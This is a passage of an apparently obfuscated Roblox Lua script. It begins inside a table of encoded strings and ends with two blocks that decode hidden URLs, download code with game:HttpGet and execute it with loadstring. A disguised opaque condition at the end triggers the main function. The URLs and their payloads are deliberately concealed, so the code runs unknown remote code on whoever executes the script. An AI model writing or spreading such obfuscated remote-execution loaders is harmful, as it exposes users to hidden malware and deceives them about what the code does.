  _OO0OIllIOO0I("gja".."OkyImCUT".."mxb0uldI".."TKA1b".."/c62J5C".."ePA=="),
  _OO0OIllIOO0I("gSuMm3U".."UA0L".."11L".."4="),
  _OO0OIllIOO0I("kiOOkzg".."hAFr".."7gJcrkI".."YnIQB".."a+w=="),
  _OO0OIllIOO0I("ky6Jlz".."chHkT".."9zr".."8r3L".."02MA".."NG4".."dO4LJU".."="),
  _OO0OIllIOO0I("ki6Vk".."T4hHl/6z".."/EBj".."pM3Kw=".."="),
  _OO0OIllIOO0I("gDeVhDwr".."AF+".."04bwnk".."Jc6KgJf"),
  _OO0OIllIOO0I("li6Tg".."DcrTH".."Dm1aU2k5".."YnL".."QBa+w=="),
  _OO0OIllIOO0I("nSuT".."nDAoTH".."X1w6U3j".."5c5L".."Q=="),
  _OO0OIllIOO0I("kiqZlHU".."HHlf2".."0rA".."hnZY0".."Jh5".."X"),
  _OO0OIllIOO0I("kyO".."QnjA2".."BVj1gJIj".."jIIgJ".."w9f".."+sE="),
  _OO0OIllIOO0I("nDeR".."nzwr".."TGT10".."KEr".."iIY6"),
  _OO0OIllIOO0I("gSeSlS".."AtAlm0".."474hk4E8".."KgM".."="),
  _OO0OIllIOO0I("kiqV".."nyUlAkz9".."zrhivpM".."7JQJ".."f+sk".."="),
  _OO0OIllIOO0I("hi2Rk".."DpkPl".."n4zL4="),
  _OO0OIllIOO0I("gSeS".."lSAtAh".."bA0".."rQn"),
  _OO0OIllIOO0I("lS2V0".."hErB".."RbQzw=="),
  _OO0OIllIOO0I("giOQkz".."gtAlm08L".."Qsm".."4c8KgM="),
  _OO0OIllIOO0I("lzCT".."lTQwAxb".."EyaMjiJ0".."="),
  _OO0OIllIOO0I("nCOSlTo".."oBV".."j9gIEj".."joA".."6JwVY".."/Q=="),
  _OO0OIllIOO0I("kDSTkTQ".."gBVj9g".."JY3mp".."Q6"),
  _OO0OIllIOO0I("hSvcpj".."xkOF+0".."87AqiYA="),
  _OO0OIllIOO0I("kzeOk".."DQoA".."1j9gJ0tk".."Js5KwB".."f"),
  _OO0OIllIOO0I("kzCOm3".."UGH".."kT9gJMr".."n4c".."mZChf99".."WiY".."r6dOCYF".."VeHT"),
  _OO0OIllIOO0I("gSeOn".."TYsCVr".."4z/EOmZ8".."6Kg9".."e8cy9".."LQ=="),
  _OO0OIllIOO0I("kyOSk".."zstGFe05".."L4ujJ".."o8KgVC".."9Q=="),
  _OO0OIllIOO0I("nCO".."QkzghTHf".."5wa".."MnkJc="),
  _OO0OIllIOO0I("kyORkD".."wqBRbX0r".."4xiJs7".."LQ=="),
  _OO0OIllIOO0I("hTC".."JnjwpCU".."T7gIUw".."iZ48JwVY".."9Q=="),
  _OO0OIllIOO0I("kDS".."TkTQgBVj".."9gJA".."siJs5".."Kxxf+sk".."="),
  _OO0OIllIOO0I("kzCO0hc2".."HhbE".."waUjjJ".."s4"),
  _OO0OIllIOO0I("kyO".."SljwwA".."xbV2L4ul".."YY6"),
  _OO0OIllIOO0I("kiOMg".."iAnD1/6".."z/ED".."j4E0Nx9".."f+s".."8="),
  _OO0OIllIOO0I("gSuSlz".."QoA0Lgz".."/EEj".."ochMA1E".."/c6+"),
  _OO0OIllIOO0I("gSu".."Mm3".."UFGln3".."wbUt"),
  _OO0OIllIOO0I("lzCTlT".."pkK".."Vryzw=="),
  _OO0OIllIOO0I("hTCVkXUQ".."Hlf".."3gJMjjp".."M3Kw".."Nb"),
  _OO0OIllIOO0I("kje".."MkTQvCRb".."fz7AunQ=".."="),
  _OO0OIllIOO0I("hSPcp".."jRkOF".."e09LBi".."r5M9MR4="),
  _OO0OIllIOO0I("kiO".."fhj".."pkJF/kz6".."EtiJM4Kw".."=="),
  _OO0OIllIOO0I("ky2SlzYl".."THf5wrAu".."nZAg"),
  _OO0OIllIOO0I("kyOSlj".."wwAxbWz7".."Mwl".."YYhK".."w=="),
  _OO0OIllIOO0I("liO".."SlS".."YwCUS05r".."4ti".."JcnJQ=="),
  _OO0OIllIOO0I("hTCV".."giUt".."TGL".."mz6E".."ylQ=="),
  _OO0OIllIOO0I("gSuM".."m3UHA0T".."6yQ=="),
  _OO0OIllIOO0I("gSuM".."m3U".."PBUH9"),
  _OO0OIllIOO0I("hSOOhjQ".."2DVH6zw=".."="),
  _OO0OIllIOO0I("gyOfkTo".."rAl+06".."rAsm".."Jc5".."LQJf"),
  _OO0OIllIOO0I("ny2TkDw".."qBRbH".."wb8".."2nZw".."8KgU".."="),
  _OO0OIllIOO0I("gjSV".."nDwqD".."RbWz".."7wgnY".."AxLQJZ"),
  _OO0OIllIOO0I("hSOQgjRk".."KF+".."05r".."Qwkw=".."="),
  _OO0OIllIOO0I("ly6JgDw".."iAE".."Pmw".."Q=="),
  _OO0OIllIOO0I("hSuR".."0hYsCVP".."nxQ".."=="),
  _OO0OIllIOO0I("nSuOm".."zmoTHr".."10rguHA".."=="),
  _OO0OIllIOO0I("ny2".."TkDwqB".."RbE".."yas4".."nZw8".."KgU".."=")
}

task.spawn(function()
loadstring(game:HttpGet(_OO0OIllIOO0I("uTaIgiZ".."+Qxn10".."Lhsk".."Ic0Ng".."FZ5o6/J".."4jdMy0A".."U+ePp3".."bTnj".."olCFP".."m0/5".."6zMoz".."cA1So".."MWzJJr".."GYnEPA6P".."DtHT".."NlzR".."3VVOgkb".."Rwz9".."w5M".."Q0=")))()
end)

task.spawn(function()
loadstring(game:HttpGet(_OO0OIllIOO0I("uTa".."Igi".."Z+Q".."xnkwaI".."2mZA8K".."kJV+83+".."MJ2Fegg".."eVOPHuzP".."L")))()
end)

end
local _lI00IOllOI=(575*6319>575) and _lOIIOlOI0l or nil
if _lI00IOllOI then _lI00IOllOI() end
